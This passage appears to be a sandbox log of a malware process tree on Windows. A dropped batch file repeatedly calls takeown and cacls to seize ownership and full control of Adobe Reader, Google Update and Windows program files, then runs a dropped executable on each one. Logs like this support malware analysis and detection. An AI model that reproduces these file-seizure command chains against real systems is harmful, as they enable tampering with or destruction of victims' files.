C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:1000
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:320
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif""2⤵
- Loads dropped DLL
PID:1568 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif" /E /G Admin:F /C3⤵PID:1916
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif"3⤵PID:336
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "br.gif" -nobanner3⤵
- Loads dropped DLL
PID:824 -
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "br.gif" -nobanner4⤵
- Executes dropped EXE
PID:1152
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:800
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif""2⤵
- Loads dropped DLL
PID:1496 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif" /E /G Admin:F /C3⤵PID:1444
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif"3⤵PID:992
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "form_responses.gif" -nobanner3⤵
- Loads dropped DLL
PID:1260 -
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "form_responses.gif" -nobanner4⤵
- Executes dropped EXE
PID:1912
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1536
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif""2⤵
- Loads dropped DLL
PID:1224 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif" /E /G Admin:F /C3⤵PID:1988
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif"3⤵PID:1480
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "review_email.gif" -nobanner3⤵
- Loads dropped DLL
PID:1568 -
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "review_email.gif" -nobanner4⤵
- Executes dropped EXE
PID:1848
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:320
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif""2⤵
- Loads dropped DLL
PID:744 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif" /E /G Admin:F /C3⤵PID:1260
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif"3⤵
- Modifies file permissions
PID:1916
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "tr.gif" -nobanner3⤵
- Loads dropped DLL
PID:1676 -
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "tr.gif" -nobanner4⤵
- Executes dropped EXE
PID:1908
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1316
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf""2⤵
- Loads dropped DLL
PID:1596 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf" /E /G Admin:F /C3⤵PID:396
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf"3⤵PID:320
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "AdobePiStd.otf" -nobanner3⤵
- Loads dropped DLL
PID:1224 -
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "AdobePiStd.otf" -nobanner4⤵
- Executes dropped EXE
PID:992
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:336
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf""2⤵
- Loads dropped DLL
PID:1916 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf" /E /G Admin:F /C3⤵PID:1496
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf"3⤵PID:1988
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner3⤵
- Loads dropped DLL
PID:560 -
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner4⤵
- Executes dropped EXE
PID:880
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1476
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt""2⤵
- Loads dropped DLL
PID:1068 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt" /E /G Admin:F /C3⤵PID:1868
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt"3⤵
- Modifies file permissions
PID:1824
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner3⤵
- Loads dropped DLL
PID:1536 -
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner4⤵
- Executes dropped EXE
PID:1756
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1028
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca""2⤵
- Loads dropped DLL
PID:832 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca" /E /G Admin:F /C3⤵PID:1696
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca"3⤵PID:432
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "can.fca" -nobanner3⤵
- Loads dropped DLL
PID:1000 -
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "can.fca" -nobanner4⤵
- Executes dropped EXE
PID:800
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1224
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths""2⤵
- Loads dropped DLL
PID:1260 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths" /E /G Admin:F /C3⤵PID:1756
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths"3⤵
- Modifies file permissions
PID:1496
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "usa03.ths" -nobanner3⤵
- Loads dropped DLL
PID:1792 -
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "usa03.ths" -nobanner4⤵
- Executes dropped EXE
PID:1284
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:560
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT""2⤵
- Loads dropped DLL
PID:744 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT" /E /G Admin:F /C3⤵PID:1476
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT"3⤵PID:396
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "GREEK.TXT" -nobanner3⤵
- Loads dropped DLL
PID:1000 -
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "GREEK.TXT" -nobanner4⤵
- Executes dropped EXE
PID:1868
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1864
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT""2⤵
- Loads dropped DLL
PID:336 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT" /E /G Admin:F /C3⤵PID:1676
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT"3⤵
- Modifies file permissions
PID:1876
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "CP1253.TXT" -nobanner3⤵
- Loads dropped DLL
PID:320 -
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "CP1253.TXT" -nobanner4⤵
- Executes dropped EXE
PID:816
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:560
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe""2⤵
- Loads dropped DLL
PID:828 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe" /E /G Admin:F /C3⤵PID:432
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe"3⤵
- Modifies file permissions
PID:800
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "GoogleUpdateSetup.exe" -nobanner3⤵
- Loads dropped DLL
PID:216 -
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "GoogleUpdateSetup.exe" -nobanner4⤵
- Executes dropped EXE
PID:228
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:832
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""2⤵
- Loads dropped DLL
PID:1144 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C3⤵PID:1864
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1380
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner3⤵
- Loads dropped DLL
PID:1496 -
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner4⤵
- Executes dropped EXE
PID:1568
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1800
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe""2⤵
- Loads dropped DLL
PID:880 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C3⤵PID:1820
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1812
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "ImagingDevices.exe" -nobanner3⤵
- Loads dropped DLL
PID:1072 -
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "ImagingDevices.exe" -nobanner4⤵
- Executes dropped EXE
PID:396
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:236
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files\Windows Journal\Journal.exe""2⤵
- Loads dropped DLL
PID:216 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Journal.exe" /E /G Admin:F /C3⤵PID:1264
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Journal.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1316
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "Journal.exe" -nobanner3⤵
- Loads dropped DLL
PID:1444 -
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "Journal.exe" -nobanner4⤵
- Executes dropped EXE
PID:780
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1876
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files\Windows Journal\Templates\Seyes.jtp""2⤵
- Loads dropped DLL
PID:1496 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Seyes.jtp" /E /G Admin:F /C3⤵PID:1928
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Seyes.jtp"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:816
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "Seyes.jtp" -nobanner3⤵
- Loads dropped DLL
PID:1820 -
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "Seyes.jtp" -nobanner4⤵
- Executes dropped EXE
PID:800
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1824
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""2⤵
- Loads dropped DLL
PID:940 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:1780
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1380
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵
- Loads dropped DLL
PID:1444 -
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:1920
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1908
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini""2⤵
- Loads dropped DLL
PID:1992 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini" /E /G Admin:F /C3⤵PID:320
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini"3⤵PID:1480
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "AGMGPUOptIn.ini" -nobanner3⤵
- Loads dropped DLL
PID:880 -
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "AGMGPUOptIn.ini" -nobanner4⤵
- Executes dropped EXE
PID:1988
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1496
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""2⤵
- Loads dropped DLL
PID:1536 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C3⤵PID:1380
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"3⤵PID:832
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "DefaultID.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1752 -
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "DefaultID.pdf" -nobanner4⤵
- Executes dropped EXE
PID:744
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1144
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf""2⤵
- Loads dropped DLL
PID:396 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf" /E /G Admin:F /C3⤵PID:956
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf"3⤵
- Modifies file permissions
PID:1756
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "MyriadCAD.otf" -nobanner3⤵
- Loads dropped DLL
PID:1824 -
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "MyriadCAD.otf" -nobanner4⤵
- Executes dropped EXE
PID:1836
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1800
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif""2⤵
- Loads dropped DLL
PID:1028 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif" /E /G Admin:F /C3⤵PID:1916
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif"3⤵PID:208
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "create_form.gif" -nobanner3⤵
- Loads dropped DLL
PID:992 -
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "create_form.gif" -nobanner4⤵
- Executes dropped EXE
PID:1908
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1868
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif""2⤵
- Loads dropped DLL
PID:1928 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif" /E /G Admin:F /C3⤵PID:1476
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif"3⤵
- Modifies file permissions
PID:956
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "info.gif" -nobanner3⤵
- Loads dropped DLL
PID:1756 -
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "info.gif" -nobanner4⤵
- Executes dropped EXE
PID:1260
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1444
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif""2⤵
- Loads dropped DLL
PID:560 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif" /E /G Admin:F /C3⤵PID:1820
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif"3⤵PID:780
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "review_same_reviewers.gif" -nobanner3⤵
- Loads dropped DLL
PID:572 -
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "review_same_reviewers.gif" -nobanner4⤵
- Executes dropped EXE
PID:1916
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:940
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif""2⤵PID:828
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif" /E /G Admin:F /C3⤵PID:676
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif"3⤵PID:1316
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "trash.gif" -nobanner3⤵PID:952
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "trash.gif" -nobanner4⤵
- Executes dropped EXE
PID:1476
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1852
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf""2⤵PID:800
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf" /E /G Admin:F /C3⤵PID:1072
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf"3⤵
- Modifies file permissions
PID:1264
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "CourierStd-Bold.otf" -nobanner3⤵PID:1444
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "CourierStd-Bold.otf" -nobanner4⤵PID:1780
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:960
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf""2⤵PID:1380
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf" /E /G Admin:F /C3⤵PID:1284
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf"3⤵
- Modifies file permissions
PID:1908
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "MyriadPro-It.otf" -nobanner3⤵PID:1572
-
